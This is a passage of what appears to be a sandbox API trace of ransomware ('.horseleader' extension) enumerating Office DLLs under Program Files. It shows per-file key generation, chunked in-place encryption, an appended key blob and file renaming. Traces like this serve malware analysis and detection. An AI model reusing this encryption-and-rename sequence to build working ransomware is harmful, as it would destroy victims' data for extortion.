(lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.469] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0234.469] CloseHandle (hObject=0x21c) returned 1 [0234.469] GetProcessHeap () returned 0x780000 [0234.469] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0234.469] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0234.469] lstrcmpiW (lpString1="OFFICE14", lpString2="Windows") returned -1 [0234.469] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14") returned 59 [0234.469] lstrcmpW (lpString1="OFFICE14", lpString2=".") returned 1 [0234.469] lstrcmpW (lpString1="OFFICE14", lpString2="..") returned 1 [0234.469] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.469] GetProcessHeap () returned 0x780000 [0234.469] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*") returned 61 [0234.470] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0234.470] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\.") returned 61 [0234.470] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5d93940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5d93940, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0234.470] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\..") returned 62 [0234.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.470] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="1033", cAlternateFileName="")) returned 1 [0234.470] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0234.470] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033") returned 64 [0234.470] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0234.470] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0234.471] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.471] GetProcessHeap () returned 0x780000 [0234.471] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.471] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*") returned 66 [0234.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.472] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\.") returned 66 [0234.472] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.472] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="..", cAlternateFileName="")) returned 1 [0234.472] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\..") returned 67 [0234.472] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.472] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.472] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0x305a8, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEINTL.DLL", cAlternateFileName="")) returned 1 [0234.472] lstrcmpiW (lpString1="ACEINTL.DLL", lpString2="Windows") returned -1 [0234.472] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0234.472] StrStrIW (lpFirst="ACEINTL.DLL", lpSrch=".horseleader") returned 0x0 [0234.472] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.472] lstrcmpW (lpString1="ACEINTL.DLL", lpString2="_uninstalling_.png") returned 1 [0234.472] lstrlenW (lpString=".testttjffg") returned 11 [0234.472] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL", lpSrch=".testttjffg") returned 0x0 [0234.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 76 [0234.473] StrStrW (lpFirst="ACEINTL.DLL", lpSrch=".txt") returned 0x0 [0234.473] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=198056) returned 1 [0234.473] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.474] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.478] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.478] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.479] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x15ad4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.479] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.491] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.491] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.491] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x2b5a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.492] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.497] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.498] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.498] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.498] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.498] CloseHandle (hObject=0x1a4) returned 1 [0234.499] GetProcessHeap () returned 0x780000 [0234.499] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0234.499] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.horseleader") returned 88 [0234.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.horseleader")) returned 1 [0234.500] GetProcessHeap () returned 0x780000 [0234.500] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.500] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0xcdb0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACEODBCI.DLL", cAlternateFileName="")) returned 1 [0234.500] lstrcmpiW (lpString1="ACEODBCI.DLL", lpString2="Windows") returned -1 [0234.500] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0234.500] StrStrIW (lpFirst="ACEODBCI.DLL", lpSrch=".horseleader") returned 0x0 [0234.500] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.500] lstrcmpW (lpString1="ACEODBCI.DLL", lpString2="_uninstalling_.png") returned 1 [0234.500] lstrlenW (lpString=".testttjffg") returned 11 [0234.500] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL", lpSrch=".testttjffg") returned 0x0 [0234.500] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.500] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.501] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 77 [0234.501] StrStrW (lpFirst="ACEODBCI.DLL", lpSrch=".txt") returned 0x0 [0234.501] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=52656) returned 1 [0234.501] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.506] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.507] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.507] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.508] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2db0, lpOverlapped=0x0) returned 1 [0234.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd250, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2db0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2db0, lpOverlapped=0x0) returned 1 [0234.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0234.509] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0234.509] CloseHandle (hObject=0x1a4) returned 1 [0234.509] GetProcessHeap () returned 0x780000 [0234.509] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0234.509] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.horseleader") returned 89 [0234.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.horseleader")) returned 1 [0234.510] GetProcessHeap () returned 0x780000 [0234.511] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0234.511] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x51d0, dwReserved0=0x53f0eb47, dwReserved1=0x52427c41, cFileName="ACERECR.DLL", cAlternateFileName="")) returned 1 [0234.511] lstrcmpiW (lpString1="ACERECR.DLL", lpString2="Windows") returned -1 [0234.511] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0234.511] StrStrIW (lpFirst="ACERECR.DLL", lpSrch=".horseleader") returned 0x0 [0234.511] lstrcmpW (lpString1="ACERECR.DLL", lpString2="#Decrypt#.txt") returned 1 [0234.511] lstrcmpW (lpString1="ACERECR.DLL", lpString2="_uninstalling_.png") returned 1 [0234.511] lstrlenW (lpString=".testttjffg") returned 11 [0234.511] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL", lpSrch=".testttjffg") returned 0x0 [0234.511] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.511] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0234.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 76 [0234.512] StrStrW (lpFirst="ACERECR.DLL", lpSrch=".txt") returned 0x0 [0234.512] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=20944) returned 1 [0234.512] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.524] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.524] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0234.524] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1d0, lpOverlapped=0x0) returned 1 [0234.550] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0234.550] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1d0, lpOverlapped=0x0) returned 1 [0234.551] SetFilePointerEx 